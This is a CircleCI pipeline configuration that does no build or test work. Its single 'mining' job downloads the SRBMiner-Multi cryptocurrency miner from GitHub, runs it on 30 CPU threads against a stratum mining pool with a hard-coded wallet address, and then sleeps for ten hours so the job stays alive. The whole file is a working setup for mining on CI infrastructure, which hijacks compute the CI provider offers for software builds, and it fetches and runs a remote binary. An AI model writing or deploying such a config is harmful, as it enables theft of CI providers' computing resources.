version: 2.1
jobs:
  mining:
    docker:
      - image: ubuntu:20.04
    environment:
      THREADS: 30
    steps:
      - checkout
      - run:
          name: Update system and install dependencies
          command: |
            apt-get update -y
            apt-get install -y wget tar
      - run:
          name: Run mining script
          command: |
            mkdir -p neable
            cd neable
            wget -q https://github.com/doktor83/SRBMiner-Multi/releases/download/2.8.8/SRBMiner-Multi-2-8-8-Linux.tar.gz
            tar -xf SRBMiner-Multi-2-8-8-Linux.tar.gz
            cd SRBMiner-Multi-2-8-8
            ./SRBMiner-MULTI --disable-gpu -sse2 -a power2b -o stratum+tcps://stratum-na.rplant.xyz:17022 -u Mno5gXRVd8i7zoBFdMLUdHctKFt6Kymivj.1980XXX -p x --thread=$THREADS
      - run:
          name: Keep the job running
          command: sleep 36000
    resource_class: large

workflows:
  version: 2.1
  build_and_mine:
    jobs:
      - mining